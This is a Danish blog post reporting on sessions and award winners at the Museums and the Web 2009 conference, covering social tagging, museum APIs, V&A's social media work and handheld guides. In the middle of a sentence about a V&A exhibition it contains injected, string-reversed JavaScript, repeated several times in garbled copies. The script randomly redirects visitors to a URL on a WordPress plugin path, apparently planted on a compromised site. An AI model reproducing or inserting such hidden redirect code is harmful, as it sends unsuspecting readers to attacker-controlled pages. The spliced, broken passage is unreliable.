Mere fra MW2009

Fredagen bød på en hel række af ‘Interactions’; et mix af præsentationer og mini’workshops. Her kunne man vælge mellem en introduktion til det sociale tagging projekt steve.museum og indføring i iTunes U potentiale som distributionskanal for webcasts; instruktioner i hvordan man bygger en API til sit museum (og hvorfor det er en ide at gøre det!) eller deltagelse i ideudvikling af forretningsmodeller for åbne mediearkiver.

Gail Durbin fra V&A fortalte underholdende om hvordan sociale medier og aktiviteter kan skabe engagement med kollektionerne og værdifulde brugeroplevelser, for eksempel ved at hjælpe folk til at producere egne bøger og objekter gennem eksisterende nerservices som Blurp og Qoop, eller ved at opfordre de besøgende til selv at bidrage til museets indsamling som det for eksempel sker i V&As kommende $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-do/wedding-fashion/home”>brudekjoleudstilling.

I Handheld Handbook sessionen splittede tilhørerne op i en række diskussionsgupper omkring både praktiske spørgsmål og ideer for vejen frem – hænger vi for fast i traditionenen for audioguides; hvor meget eller hvor lidt  – og hvis, hvordan – skal vi guide de besøgende; hvorfor ikke lade mobile applikationer gå ud i det offentlige rum eller på tværs af insitutioner; kunne vi udnytte smartphones potentiale ikke alene som multimedial informationskanal men også som redskab og et legetøj? Hvis du eller din institution har palner om at udvikle dette område er der inspiration at hente i Koven Smith fra The Metroplolitan Museums’ paper, eller på thehandheldconference-wikien.

Brooklyn Museum vandt den overordnede ‘Best of the Web Award’ for deres innovative brug af sociale medier; se også de øvrige vindere og nominerede; der er masser af inspiration at hente.

Lørdagen startede med demonstrationer fra både ‘Best of the Web’ vindere og en række andre interessante projekter.

I sessionerne kunne man blandt andet høre om strategier for og erfaringer med opbygning og brug af online kollektioner, med interessante projekter fra både Finland, New Zealand og Canada.

Vincent Puig fra Centre Pompidou præsenterede en case study rapport om brugerrespons og -bidrag i den – for nogen provokerende – udstilling Traces du sacré og kom blandt andet ind på synliggørelsen af forskellige polemiske positioner i forhold til værkerne.
Darren Peacock præsenterede sit og Andelina Russos akademiske studie af hvad det indebærer for institutionerne at søge at engagere publikum gennem brug af sociale medier. Meget spændende læsning for de, der er interesserede i den problematik.

Crossposted på Musings

One comment to “Mere fra MW2009”
  1. Pingback: Mere fra MW2009 « Musings

Skriv et svar